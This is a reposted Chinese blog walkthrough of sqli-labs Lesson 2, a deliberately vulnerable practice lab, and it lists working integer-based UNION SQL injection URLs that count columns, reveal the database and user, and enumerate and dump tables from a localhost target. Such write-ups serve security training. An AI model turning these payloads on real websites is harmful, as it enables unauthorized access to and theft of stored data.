sqli-labs less2 GET - Error based - Intiger based (基于错误的GET整型注入)

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less2 GET - Error based - Intiger based (基于错误的GET整型注入)相关的知识,希望对你有一定的参考价值。

与less1相同,直接走流程

提交参数,直接order by

技术分享图片

http://localhost/sqli/Less-2/?id=1 order by 1%23
http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23

技术分享图片

http://localhost/sqli/Less-2/?id=-1 union select 1,database(),user()%23

技术分享图片

http://localhost/sqli/Less-2/?id=-1 union select 1,table_name,3 from information_schema.tables where table_schema=‘security‘ limit 0,1%23

技术分享图片

http://localhost/sqli/Less-2/?id=-1 union select 1,column_name,3 from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 0,1%23

技术分享图片

http://localhost/sqli/Less-2/?id=-1 union select 1,id,email_id from emails limit 0,1%23

技术分享图片

 

以上是关于sqli-labs less2 GET - Error based - Intiger based (基于错误的GET整型注入)的主要内容,如果未能解决你的问题,请参考以下文章

Less2-Less4

sqli-labs less33 GET- Bypass AddSlashes (GET型绕过addslashes() 函数的宽字节注入)

sqli-labs less7 GET - Dump into outfile - String (导出文件GET字符型注入)

sqli-labs less4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

sqli-labs less41 GET -Blind based -Intiger -Stacked(GET型基于盲注的堆叠查询整型注入)

sqli-labs less40 GET -Blind based -String -Stacked(GET型基于盲注的堆叠查询字符型注入)